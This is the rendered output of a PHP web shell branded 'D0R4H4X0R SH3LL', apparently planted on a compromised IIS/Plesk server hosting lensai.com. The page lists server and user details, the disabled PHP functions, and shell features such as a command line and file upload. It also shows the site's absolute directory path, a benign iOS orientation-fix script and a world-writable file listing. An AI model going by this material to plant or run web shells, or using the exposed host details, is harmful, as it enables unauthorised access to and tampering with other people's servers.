D0R4H4X0R SH3LL

Server Information

Server: Microsoft-IIS/10.0
System: Windows NT BH-PLESK-WEB3 10.0 build 20348 (Windows Server 2022) AMD64
User: IWPD_8556(lensai) ( 0 )
PHP Version: 8.3.21
Python Version: Python is not available
Disabled Functions:, Cron, Curl, Ftp, GCC, Mail, Mysql, PKEXEC, Perl, Python, SendMail, Ssh, Wget, exec, passthru, shell_exec, system

Features

Command Line

Find Longest Directory Path

Scan New PHP Files

Upload File

Directory: D:/INETPUB/VHOSTS/lensai.com/httpdocs/js/

Current File : D:/INETPUB/VHOSTS/lensai.com/httpdocs/js/ios-orientationchange-fix.js

/*! A fix for the iOS orientationchange zoom bug.
 Script by @scottjehl, rebound by @wilto.
 MIT / GPLv2 License.
*/
(function(w){
	
	// This fix addresses an iOS bug, so return early if the UA claims it's something else.
	var ua = navigator.userAgent;
	if( !( /iPhone|iPad|iPod/.test( navigator.platform ) && /OS [1-5]_[0-9_]* like Mac OS X/i.test(ua) && ua.indexOf( "AppleWebKit" ) > -1 ) ){
		return;
	}

    var doc = w.document;

    if( !doc.querySelector ){ return; }

    var meta = doc.querySelector( "meta[name=viewport]" ),
        initialContent = meta && meta.getAttribute( "content" ),
        disabledZoom = initialContent + ",maximum-scale=1",
        enabledZoom = initialContent + ",maximum-scale=10",
        enabled = true,
		x, y, z, aig;

    if( !meta ){ return; }

    function restoreZoom(){
        meta.setAttribute( "content", enabledZoom );
        enabled = true;
    }

    function disableZoom(){
        meta.setAttribute( "content", disabledZoom );
        enabled = false;
    }
	
    function checkTilt( e ){
		aig = e.accelerationIncludingGravity;
		x = Math.abs( aig.x );
		y = Math.abs( aig.y );
		z = Math.abs( aig.z );
				
		// If portrait orientation and in one of the danger zones
        if( (!w.orientation || w.orientation === 180) && ( x > 7 || ( ( z > 6 && y < 8 || z < 8 && y > 6 ) && x > 5 ) ) ){
			if( enabled ){
				disableZoom();
			}        	
        }
		else if( !enabled ){
			restoreZoom();
        }
    }
	
	w.addEventListener( "orientationchange", restoreZoom, false );
	w.addEventListener( "devicemotion", checkTilt, false );

})( this );
bootstrap.js 65.963 KB
File -rw-rw-rw-
Chart.js 107.043 KB
File -rw-rw-rw-
classie.js 1.617 KB
File -rw-rw-rw-
clndr.js 57.552 KB
File -rw-rw-rw-
custom.js 1.153 KB
File -rw-rw-rw-
demoad.js 0.880 KB
File -rw-rw-rw-
gallery.js 6.294 KB
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
jquery-slider.js 7.303 KB
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
jquery.min.js 90.458 KB
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
jquery.vmap.js 30.835 KB
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
jquery.wookmark.js 12.465 KB
File -rw-rw-rw-
login.php 0.582 KB
File -rw-rw-rw-
metisMenu.min.js 1.835 KB
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
moment-2.2.1.js 92.704 KB
File -rw-rw-rw-
scripts.js 0.647 KB
File -rw-rw-rw-
site.js 2.509 KB
File -rw-rw-rw-
skycons.js 16.451 KB
File -rw-rw-rw-
test.html 0.006 KB
File -rw-rw-rw-
underscore-min.js 14.021 KB
File -rw-rw-rw-
validator.min.js 5.935 KB
File -rw-rw-rw-
wow.min.js 4.664 KB
File -rw-rw-rw-
D0R4H4X0R SH3LL